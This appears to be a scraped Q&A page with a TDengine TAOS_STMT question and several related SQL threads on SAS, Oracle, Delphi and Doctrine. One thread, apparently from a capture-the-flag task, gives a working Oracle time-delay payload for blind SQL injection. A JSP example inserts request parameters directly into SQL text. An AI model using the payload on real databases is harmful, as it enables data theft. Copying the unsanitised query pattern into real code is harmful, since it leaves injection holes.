I am testing some C code using TAOS C API. There is a test running SQL, using TAOS_STMT related API. While I passed "create database testdb;" to that code, which calls taos_stmt_init, taos_stmt_prepare, taos_stmt_execute sequentially to execute it, taos_stmt_execute returns 2147484202, Stmt API usage error. I noticed that in taos c examples, TAOS_STMT only runs DML. Does that means TAOS_STMT can not be used to run DDL?
Does that means TAOS_STMT can not be used to run DDL?
currently, taos-prepare leaded API sequense will fail if the SQL statement is not parameterized one in TDengine database .
I think that is the rule for this API.
Related
When trying to do an SQL injection on an Oracle SQL database I have the problem that most of the examples in the tutorials do not work. I already found out that I only can use CASE WHEN a THEN b ELSE c END instead of normal if statements.
The question I have now is how do I get time delay into the injection? Benchmark() and sleep() do not work either.
I already now that the table is named "flag" and the field name I want to read out is named "password".
My only information i get from the database is the time it needed to execute my input (or query since I bypass the input to inject SQL)
I found the following SQL statement on the web at SQL Injection Tutorial
select dbms_pipe.receive_message(('a'),10) from dual;
I am not certain I should be participating in this sort of thing, but since I found it with my first Google Search, I will go ahead and post it.
I tested it and it delayed the result by 10 seconds.
I am using SAS Enterprise Guide (EG) 6.1 and want to know what are the indexes of our Oracle tables. Is there a way to write a program to get this information?
I tried to do:
LIBNAME DW ORACLE USER='username' PASSWORD='password' PATH='path.world' SCHEMA='schema';
DATA _NULL_ ;
dsid = OPEN(DW.some_table) ;
isIndexed = ATTRN(dsid,"ISINDEX") ;
PUT isIndexed = ;
RUN ;
some_table is the name of (my table), but I get an error:
ERROR: DATA STEP Component Object failure. Aborted during the COMPILATION phase.
ERROR 557-185: Variable some_table is not an object.
Reference: https://communities.sas.com/t5/ODS-and-Base-Reporting/check-if-index-exists/td-p/1966
OPEN takes a string or a value that resolves to a string. So you need
dsid= OPEN('dw.some_dataset');
I don't know if you can use that with Oracle or not, and I don't know whether ATTRN will be useful for this particular purpose or not. These all work well with SAS datasets, but it's up to the libname engine (and whatever middleware it uses) to implement the functionality that ATTRN would use.
For example, I don't use Oracle but I do have SQL Server tables with indexes, and I can run the above code on them; the code appears to work (it doesn't show errors) but it shows the tables as being unindexed, when they clearly are.
Your best bet is to connect using pass-through (CONNECT TO ...) instead of libname, and then you can run native Oracle syntax rather than using SAS.
I am using SQL Server database and after calling a simple SQL script I would like to know how many records were affected by last (or only) executed statement in a script.
I cannot find the reference how to achieve this in Delphi's TADOCommand and I know SQL Server gives this information to provider. I am aware of workarounds like getting ##ROWCOUNT in another query, yet this gives some overhead and unnecessary complexity.
Thanks.
Do you use the
function Execute(var RecordsAffected: Integer; const Parameters: OleVariant): _Recordset;
version of the Execute method?
From the doc:
RecordsAffected indicates the number
of records, if the command operates on
data, that are affected by the command
after execution.
So that should give you what you need.
Disclaimer: I cannot test this against SQL Server (don't have it).
I am rather new to SAS and I have run into a problem that I think probably has a better solution than what I've found so far.
I need to update a Oracle db table that has around 1 million rows with data from a SAS data set that has about 10,000 records.
I used an update statement within proc sql, but it takes hours to update the Oracle table. Right now, I am loading the data from the SAS data set into a temporary table in the Oracle db and doing a proc sql pass through execute statement to update the main table from the temporary table. This takes only a couple of minutes at most.
However, this is rather cumbersome to program and and I need to update the Oracle table from multiple functions within my SAS code.
Is there an analog to JDBC batch update in SAS (I uses to do Java programming before getting involved in SAS)? Something that is faster than using an update statement in proc sql, but easier to code than temp table + update using pass through?
Are you using SAS/Access to connect your SAS sessions to Oracle?
In my situation, I use SAS/Connect JDBC.
SAS/Connect is a very simple but effective strategy for interfacing the SAS substrate system to JEE. Essentially sas/connect is yet another telnet implementation by sas to execute sas -dmr.
I draw the sas data out using sas/connect jdbc into my jsp and then push the data into oracle or sql server using java programming techniques we are all familiar with.
Read my ancient paper on using sas/connect to connect sas to JEE:
http://www.nesug.org/proceedings/nesug04/ap/ap02.pdf.
BTW do not try to contact me with the contacts listed on the paper - they are ancient.
In response to your further statement:
I thought you wanted a way to use JDBC to insert the data into Oracle?
My paper shows you how to embed a whole block of SAS macro or SQL or any text in a JSP and then submit that block of text to be run through SAS/Connect.
String datasetname = request.getParameter("datasetname");
String where = request.getParameter("where");
<t:text id="macHello">
%macro hello(datasetname);
data &datasetname;
/* code to create your data */
run;
%mend;
%hello(<%=datasetname%>);
</t:text>
sasConnect.submit(macHello);
<t:text id="SQLgetRecs">
SELECT *
FROM <%=datasetname%>
WHERE <%=where%>
</t:text>
ResultSet mydata =
sasConnJDBC.executeQuery(SQLgetRecs);
Then do whatever you need to do with Java,
either by interweaving insertion in Oracle per iteration of Resultset
or iterate resultset to produce a text block of SQL insert VALUES
which you then submit to Oracle JDBC.
It would just be a single JSP, provided you know how to work a JSP and willing to understand how the text-block tag library I wrote works. You see, I use this technique to allow a JSP run SAS macros that have been running in production batch mode for ages, without any change to the macros. Not only so, the tag lib allows me to embed java and jsp variable resolution into the macros or sas/sql blocks.
I wrote this block-text tag lib because I used to do such operations in Perl (prior to 2003), where Perl (and other scripting languages) allows you to assign a variable to a continuous block of text within the code of the script.
Instructions on using the tag lib:
http://h2g2java.blessedgeek.com/2009/07/jsp-text-custom-tag.html
http://h2g2java.blessedgeek.com/2009/07/referencing-text-jsp-custom-tag-defined.html
I have been researching a way to get the SQL statements that are built by a generated Migration file. These extend Doctrine_Migration_Base. Essentially I would like to save the SQL as change scripts.
The execution path leads me to Doctrine_Export which has methods that build the SQL statement and executes them. I have found no way of asking for just them. The export methods found in Doctrine_Export only operate on Doctrine_Record models and not Migration scripts.
From the command line './doctrine migrate version#' the path goes:
Doctrine_Cli::run(cmd)
Doctrine_Task_Migrate::setArguments(args)
Doctrine_Task_Migrate::execute()
Doctrine_Migration::migrate(to)
Doctrine_Migration_Process::Doctrine_Export::various
create, drop, alter methods with sql
equivalents.
Has anyone tackled this before? I really would not like to change Doctrine base files. Any help is greatly appreciated.
Could you make a dev server, and do the migration on that, storing a SQL Trace as you go?you don't have to keep the results, but you would get a list of every command.
Taking into account Rob Farley's suggestion, I modified:
Doctrine_Core::migrate
Doctrine_Task_Migrate::execute
When the execute method is called the optional argument 'dryRun' is checked. If true
then a 'Doctrine_Connection_Profiler' instance is created. The 'dryRun' value is then passed onto
the 'Doctrine_Core::migrate' method. The 'dryRun' value of true allows the changes to rollback when done executing the SQL statements. When the method returns, the profiler is parsed and non-empty SQL statements
not containing 'migration_version' are saved and displayed to the terminal.